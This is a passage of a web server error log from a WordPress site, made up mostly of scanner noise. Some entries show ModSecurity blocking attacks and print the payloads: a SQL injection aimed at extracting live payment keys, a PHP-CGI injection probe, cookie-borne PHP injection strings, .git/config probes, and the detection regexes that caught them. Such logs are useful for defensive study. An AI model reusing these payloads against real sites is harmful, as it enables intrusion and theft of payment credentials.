[autoindex:error] [pid 24164:tid 139748161054464] [client 176.96.138.154:48948] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Jun 12 21:42:12.298623 2024] [autoindex:error] [pid 24164:tid 139748177839872] [client 176.96.138.154:48952] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Jun 12 21:42:19.296715 2024] [:error] [pid 23550:tid 139748077127424] [client 176.96.138.154:48966] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/xmrlpc.php [Wed Jun 12 21:42:19.509701 2024] [:error] [pid 23548:tid 139748177839872] [client 176.96.138.154:48968] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/xmrlpc.php [Wed Jun 12 21:42:58.159308 2024] [:error] [pid 23548:tid 139748060342016] [client 176.96.138.154:49068] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/about.php [Wed Jun 12 21:43:12.640059 2024] [:error] [pid 23550:tid 139748051949312] [client 176.96.138.154:49100] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Wed Jun 12 21:43:12.765367 2024] [:error] [pid 23550:tid 139748203017984] [client 176.96.138.154:49102] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Wed Jun 12 21:43:57.410062 2024] [autoindex:error] [pid 24164:tid 139748135876352] [client 176.96.138.154:49208] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Jun 12 21:44:09.142206 2024] [:error] [pid 24164:tid 139748110698240] [client 176.96.138.154:49238] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Wed Jun 12 21:44:10.157523 2024] [autoindex:error] [pid 24164:tid 139748043556608] [client 176.96.138.154:49242] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Jun 12 21:44:11.330197 2024] [autoindex:error] [pid 24164:tid 139748152661760] [client 176.96.138.154:49246] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Jun 12 21:44:19.085928 2024] [:error] [pid 23548:tid 139748110698240] [client 176.96.138.154:49270] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/xmrlpc.php [Wed Jun 12 21:44:19.400533 2024] [:error] [pid 23548:tid 139748093912832] [client 176.96.138.154:49272] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/xmrlpc.php 2024/06/13 08:46:36 [error] 14977#14977: *364261 access forbidden by rule, client: 149.202.127.102, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Thu Jun 13 10:46:37.741204 2024] [:error] [pid 15638:tid 139967112132352] [client 64.95.11.76:33976] [client 64.95.11.76] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at REQUEST_COOKIES:14[47]. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fopen found within REQUEST_COOKIES:14[47]: fopen"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-catcher/index.php"] [unique_id "ZmsUXWc_jRPihF2WUDJzjwAAAMQ"], referer: www.google.com [Thu Jun 13 10:46:50.046844 2024] [:error] [pid 15022:tid 139967095346944] [client 64.95.11.76:33978] [client 64.95.11.76] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at REQUEST_COOKIES:14[47]. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fopen found within REQUEST_COOKIES:14[47]: fopen"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-catcher/index.php"] [unique_id "ZmsUascjIOYUoLE39_ByhQAAAEY"], referer: www.google.com [Fri Jun 14 09:00:02.235536 2024] [:error] [pid 5692:tid 140179693737728] [client 3.1.174.202:50716] [client 3.1.174.202] ModSecurity: Access denied with code 403 (phase 2). Pattern match "<\\\\?(?!xml)" at ARGS_NAMES:<?php echo 409723*20;?>. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "230"] [id "959151"] [rev "2"] [msg "PHP Injection Attack"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/cgi-bin/php-cgi.exe"] [unique_id "ZmxM4oIF1WT3326_QCBVZgAAAMI"] [Fri Jun 14 09:00:02.626460 2024] [:error] [pid 5074:tid 140179511654144] [client 3.1.174.202:50718] [client 3.1.174.202] ModSecurity: Access denied with code 403 (phase 2). Pattern match "<\\\\?(?!xml)" at ARGS_NAMES:<?php echo 409723*20;?>. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "230"] [id "959151"] [rev "2"] [msg "PHP Injection Attack"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/php-cgi/php-cgi.exe"] [unique_id "ZmxM4g3P6M30mGWiHhr1BgAAAA8"] [Fri Jun 14 14:04:49.955228 2024] [autoindex:error] [pid 344:tid 140289998055168] [client 4.242.216.5:56888] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Fri Jun 14 17:52:34.601471 2024] [:error] [pid 11171:tid 140289846986496] [client 84.239.54.49:60670] [client 84.239.54.49] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^0?$" against "REQUEST_HEADERS:Content-Length" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "280"] [id "960011"] [rev "1"] [msg "GET or HEAD Request with Body Content."] [data "34"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [tag "CAPEC-272"] [hostname "investigacionperu.com"] [uri "/index.php"] [unique_id "ZmzJstw8G41sA755z5i4kAAAANQ"] [Fri Jun 14 17:52:34.926129 2024] [:error] [pid 11170:tid 140289998055168] [client 84.239.54.49:60672] [client 84.239.54.49] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^0?$" against "REQUEST_HEADERS:Content-Length" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "280"] [id "960011"] [rev "1"] [msg "GET or HEAD Request with Body Content."] [data "34"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [tag "CAPEC-272"] [hostname "investigacionperu.com"] [uri "/test.php"] [unique_id "ZmzJsq9ipmnvVqw-YMzumQAAAEI"] [Fri Jun 14 18:20:47.097994 2024] [:error] [pid 11171:tid 140290006447872] [client 5.188.62.140:32930] [client 5.188.62.140] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "ZmzQT9w8G41sA755z5i4tAAAAME"] [Fri Jun 14 21:33:42.200163 2024] [:error] [pid 11451:tid 140290087155456] [client 185.53.59.186:35138] [client 185.53.59.186] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(union(.*?)select(.*?)from)))" at ARGS:calculate_attribute_counts[][taxonomy]. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "225"] [id "981276"] [msg "Looking for basic sql injection. Common attack string for mysql, oracle and others."] [data "Matched Data: union%20all%20select%201%2Coption_value%20from found within ARGS:calculate_attribute_counts[][taxonomy]: %22%29%20union%20all%20select%201%2Coption_value%20from%20wp_options%20where%20option_value%20like%20%27%25pk_live%25%27%3B%00"] [severity "CRITICAL"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "investigacionperu.com"] [uri "/wp-json/wc/store/products/collection-data"] [unique_id "Zmz9huj6VT-qa2dzkuIjegAAAIA"] [Sat Jun 15 12:50:05.444345 2024] [:error] [pid 27470:tid 140567157630720] [client 5.188.62.140:50974] [client 5.188.62.140] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Zm3UTak-UHEbpK7NCsXMAwAAAMk"] [Sun Jun 16 03:46:01.725741 2024] [authz_core:error] [pid 9305:tid 139835721369344] [client 159.65.18.197:35478] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/06/16 03:46:05 [error] 8353#8353: *8817 access forbidden by rule, client: 159.65.18.197, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Sun Jun 16 03:46:08.405106 2024] [authz_core:error] [pid 8396:tid 139835671013120] [client 192.46.211.230:35508] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/06/16 03:46:12 [error] 8352#8352: *8844 access forbidden by rule, client: 192.46.211.230, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Sun Jun 16 07:04:41.887877 2024] [authz_core:error] [pid 8395:tid 139835834025728] [client 68.183.180.73:38070] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/06/16 07:04:48 [error] 8352#8352: *10354 access forbidden by rule, client: 68.183.180.73, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Sun Jun 16 07:07:03.183828 2024] [:error] [pid 9305:tid 139835595478784] [client 51.15.184.67:38130] [client 51.15.184.67] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at REQUEST_COOKIES:14[47]. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fopen found within REQUEST_COOKIES:14[47]: fopen"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-catcher/index.php"] [unique_id "Zm7VZ1gwu2IpOosaypvYSQAAANg"], referer: www.google.com [Sun Jun 16 07:07:03.609054 2024] [:error] [pid 8396:tid 139835721369344] [client 51.15.184.67:38132] [client 51.15.184.67] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at REQUEST_COOKIES:14[47]. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fopen found within REQUEST_COOKIES:14[47]: fopen"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-catcher/index.php"] [unique_id "Zm7VZ_f4ZbuK5TNBzg_AKAAAAIk"], referer: www.google.com [Sun Jun 16 10:49:22.316390 2024] [authz_core:error] [pid 9305:tid 139835629049600] [client 147.182.149.75:41236] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/06/16 10:49:25 [error] 8353#8353: *12511 access forbidden by rule, client: 147.182.149.75, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2024/06/17 16:35:49 [error] 22935#22935: *30943 access forbidden by rule, client: 179.43.188.122, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Mon Jun 17 20:34:04.805023 2024] [autoindex:error] [pid 22975:tid 140029296838400] [client 167.71.215.152:45814] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com [Mon Jun 17 20:34:05.561801 2024] [autoindex:error] [pid 23586:tid 140029246482176] [client 167.71.215.152:45816] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com [Mon Jun 17 20:34:06.263875 2024] [autoindex:error] [pid 23586:tid 140029322016512] [client 167.71.215.152:45818] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com [Mon Jun 17 20:34:06.921033 2024] [autoindex:error] [pid 22976:tid 140029414336256] [client 167.71.215.152:45820] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/ID3/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com [Mon Jun 17 20:34:07.508970 2024] [autoindex:error] [pid 22974:tid 140029414336256] [client 167.71.215.152:45822] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/IXR/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com [Mon Jun 17 20:34:08.066035 2024] [autoindex:error] [pid 22975:tid 140029254874880] [client 167.71.215.152:45826] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/Requests/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com [Mon Jun 17 20:34:08.864441 2024] [autoindex:error] [pid 23586:tid 140029305231104] [client 167.71.215.152:45828] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/SimplePie/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com [Mon Jun 17 20:34:09.396385 2024] [autoindex:error] [pid 23586:tid 140029338801920] [client 167.71.215.152:45830] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/Text/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com [Mon Jun 17 20:34:27.687363 2024] [autoindex:error] [pid 22976:tid 140029305231104] [client 167.71.215.152:45868] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/Text/Diff/Renderer/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com [Mon Jun 17 20:34:28.721432 2024] [:error] [pid 22975:tid 140029263267584] [client 167.71.215.152:45870] PHP Warning: Use of undefined constant ABSPATH - assumed 'ABSPATH' (this will throw an Error in a future version of PHP) in /home/investig/public_html/wp-includes/blocks/index.php on line 9, referer: www.google.com [Mon Jun 17 20:34:28.721854 2024] [:error] [pid 22975:tid 140029263267584] [client 167.71.215.152:45870] PHP Warning: Use of undefined constant WPINC - assumed 'WPINC' (this will throw an Error in a future version of PHP) in /home/investig/public_html/wp-includes/blocks/index.php on line 9, referer: www.google.com [Mon Jun 17 20:34:28.721996 2024] [:error] [pid 22975:tid 140029263267584] [client 167.71.215.152:45870] PHP Warning: require(ABSPATHWPINC/blocks/archives.php): failed to open stream: No such file or directory in /home/investig/public_html/wp-includes/blocks/index.php on line 9, referer: www.google.com [Mon Jun 17 20:34:28.722174 2024] [:error] [pid 22975:tid 140029263267584] [client 167.71.215.152:45870] PHP Fatal error: require(): Failed opening required 'ABSPATHWPINC/blocks/archives.php' (include_path='.:/usr/local/lib/php') in /home/investig/public_html/wp-includes/blocks/index.php on line 9, referer: www.google.com [Mon Jun 17 20:34:30.863276 2024] [autoindex:error] [pid 22975:tid 140029338801920] [client 167.71.215.152:45872] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/certificates/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com [Mon Jun 17 20:34:31.480860 2024] [autoindex:error] [pid 22976:tid 140029254874880] [client 167.71.215.152:45874] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/customize/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com [Mon Jun 17 20:34:32.870023 2024] [autoindex:error] [pid 22974:tid 140029422728960] [client 167.71.215.152:45876] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/fonts/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com [Mon Jun 17 20:34:33.773053 2024] [autoindex:error] [pid 23586:tid 140029271660288] [client 167.71.215.152:45878] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com [Mon Jun 17 20:34:35.188872 2024] [autoindex:error] [pid 22974:tid 140029254874880] [client 167.71.215.152:45880] AH01276: Cannot serve directory /home/investig/public_html/.well-known/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com 2024/06/17 20:34:46 [error] 22936#22936: *33142 directory index of "/usr/local/apache/autossl_tmp/.well-known/acme-challenge/" is forbidden, client: 167.71.215.152, server: investigacionperu.com, request: "GET /.well-known/acme-challenge/ HTTP/1.1", host: "investigacionperu.com", referrer: "www.google.com" [Mon Jun 17 20:34:47.260994 2024] [autoindex:error] [pid 23586:tid 140029363980032] [client 167.71.215.152:45892] AH01276: Cannot serve directory /home/investig/public_html/.well-known/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com 2024/06/17 20:34:55 [error] 22935#22935: *33157 directory index of "/usr/local/apache/autossl_tmp/.well-known/acme-challenge/" is forbidden, client: 167.71.215.152, server: investigacionperu.com, request: "GET /.well-known/acme-challenge/ HTTP/1.1", host: "investigacionperu.com", referrer: "www.google.com" [Mon Jun 17 20:34:57.491720 2024] [autoindex:error] [pid 23586:tid 140029229696768] [client 167.71.215.152:45908] AH01276: Cannot serve directory /home/investig/public_html/.well-known/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com [Mon Jun 17 20:35:26.395385 2024] [autoindex:error] [pid 23586:tid 140029414336256] [client 167.71.215.152:45938] AH01276: Cannot serve directory /home/investig/public_html/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com [Mon Jun 17 20:35:45.074039 2024] [autoindex:error] [pid 23586:tid 140029322016512] [client 167.71.215.152:45952] AH01276: Cannot serve directory /home/investig/public_html/vendor/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com [Mon Jun 17 20:36:20.164362 2024] [autoindex:error] [pid 22974:tid 140029355587328] [client 167.71.215.152:45984] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/assets/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com [Mon Jun 17 20:36:20.708741 2024] [autoindex:error] [pid 22976:tid 140029338801920] [client 167.71.215.152:45986] AH01276: Cannot serve directory 